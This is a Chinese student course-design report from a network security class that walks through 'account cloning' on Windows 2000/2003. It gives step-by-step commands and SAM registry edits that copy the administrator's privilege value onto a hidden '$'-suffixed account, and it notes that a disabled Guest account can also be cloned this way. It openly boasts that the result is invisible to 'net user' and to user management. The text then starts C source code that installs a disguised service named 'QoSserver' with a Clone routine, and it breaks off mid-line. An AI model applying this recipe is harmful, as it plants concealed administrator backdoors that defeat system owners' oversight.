网络安全账号克隆课程设计报告.docVIP

哈 尔 滨 理 工 大 学 计算机学院网络工系 课程设计报告 实验名称 账号克隆 课程名称 网络安全技术 姓名 易能 学号 0704020220 日期 2010-7-8 地点 计算机实验室 成绩 教师 孙晓华 备注：本课程设计由王雷、易能、鞠万慧三人共同设计并实现。 1.设计目的 本设计基于对注册表的修改来实现账号权限的提升，使低权限用户拥有管理员级别的权限。实现本设计可增强管理员对系统账户管理的意识和能力。 2.实验环境（软件、硬件及条件） 软件：win2000或win2003，VMware Workstation，Visual C++ 6.0 硬件：计算机一台 条件：具有添加用户权限的账号 3.实现方法和过程 1、拿hello$为例（后面加$ 是为了使在控制台下用 net user 看不到），开始——运行CMD，进入命令行。 2、建立用户，输入 net user hello$ 123 /add 3、进入注册表，查看HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ Account\Users\Names\hello$右侧的类型值，我这里为0x3f9，将该键值导出，保存为hello$.reg。 4、到上一级的USERS里找到对应类型的键值，并导出 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F9]保存为3f9.reg [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EB]保存为3eb.reg(administrator对应键) 5、用记事本打开3eb.reg 找到如下的F的值,比如这个例子中如下: F=hex:02,00,01,00,00,00,00,00,10,2e,0f,ac,ca,d5,c8,01,00,00,00,00,00,00,00,\ 00,e0,bf,91,ea,e6,7e,c8,01,00,00,00,00,00,00,00,00,30,ab,9c,a9,ca,d5,c8,01,\ eb,03,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,85,00,01,00,00,00,00,\ 00,e5,77,00,00,09,00 把其复制后,打开3f9.reg,找到F的值,将其删除,然后把上面的那段粘贴。 6、打开hello$.reg，把里面的内容，如下面这段复制 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hello$] @=hex(3f9): 回到3f9.reg 粘贴上面这段到文件最后即可。 7、保存后，运行 net user hello$ /del 将刚才建立的帐号删除。（在导入数据库之前一定要先删除这个新加的帐号） 8、双击保存的3f9.reg导入注册表，完成克隆。 9、注销当前用户，用刚才新建立的帐号登陆就是管理员权限了。你会发现包括桌面、收藏夹、我的文档等所有东西都是和系统管理员一模一样的，哈哈，好玩吧！（你用命令或在用户管理里面都是查看不出来的，嘿嘿，够隐蔽吧！！） 10、WINDOWS的GUEST帐户也可以克隆成管理员的，并且如果之前GUEST帐户是禁用状态，克隆完后还是禁用状态，但是可以用GUEST帐号登陆，并且还是管理员权限。HOHO~~大家自己试试吧。 过程 #include windows.h #include stdio.h void WINAPI KServiceMain(DWORD argc, LPTSTR * argv); void InstallService(const char * szServiceName); int Clone(char *user); int main(int argc, char * argv[]) { if ((argc==2) (::strcmp(argv[1], install)==0)) { InstallService(QoSserver10); return 0; } SERVICE_TABLE_ENTRY service_table_entry[] ={ { QoSserver,KServiceMain },{ NULL,NULL }}; // NULL,NULL标志表的结束 // QoSserver后台服务线程名称，KServiceMain后台服务线程入口点//定义了两个SERVICE_TABLE_ENTRY结构数组 StartServiceCtrlDispatcher(service_tab